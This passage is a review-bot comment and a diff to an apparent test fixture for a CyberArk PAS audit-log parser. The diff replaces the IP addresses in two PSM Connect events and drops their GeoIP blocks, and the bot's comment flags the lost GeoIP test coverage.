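Review bot: The `@@ -1086,39 +988,18 @@` hunk removes `source.geo` and `destination.geo` wholesale instead of updating them for the new addresses, so the expected output no longer asserts anything about GeoIP enrichment for this event; the second event loses its `geo` blocks the same way in `@@ -1220,39 +1100,18 @@`. Presumably the new addresses are not resolvable by the GeoIP database the test runner uses, but that is not visible in this diff, and if the pipeline still carries geoip processors this leaves that path unexercised by the test. Worth confirming the loss of geo coverage is intended, and if the runner provides a test GeoIP database, choosing addresses it resolves so the `geo` objects remain in the fixture.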
@@ -1146,16 +1027,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:31:56Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n 
\u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1167,13 +1047,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "29f340df-89e9-405a-beae-0216390cda42", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -1183,9 +1063,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 03:31:56", "desc": "PSM Connect" 
@@ -1196,8 +1076,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936287500Z", - "original": "\u003c5\u003e1 2021-03-15T10:31:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:56\",\"IsoTimestamp\":\"2021-03-15T10:31:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331182700Z", + "original": "\u003c5\u003e1 2021-03-15T10:31:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:31:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:31:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n 
\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:31:56\",\"IsoTimestamp\":\"2021-03-15T10:31:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -1220,39 +1100,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1269,7 +1128,7 @@ }, "@timestamp": "2021-03-15T10:33:39.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -1280,16 +1139,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:33:39Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n 
\u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -1301,13 +1159,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -1317,9 +1175,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 15 03:33:39", "desc": "PSM Connect" 
@@ -1330,8 +1188,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936290300Z", - "original": "\u003c5\u003e1 2021-03-15T10:33:39Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:39\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:39Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:39\",\"IsoTimestamp\":\"2021-03-15T10:33:39Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
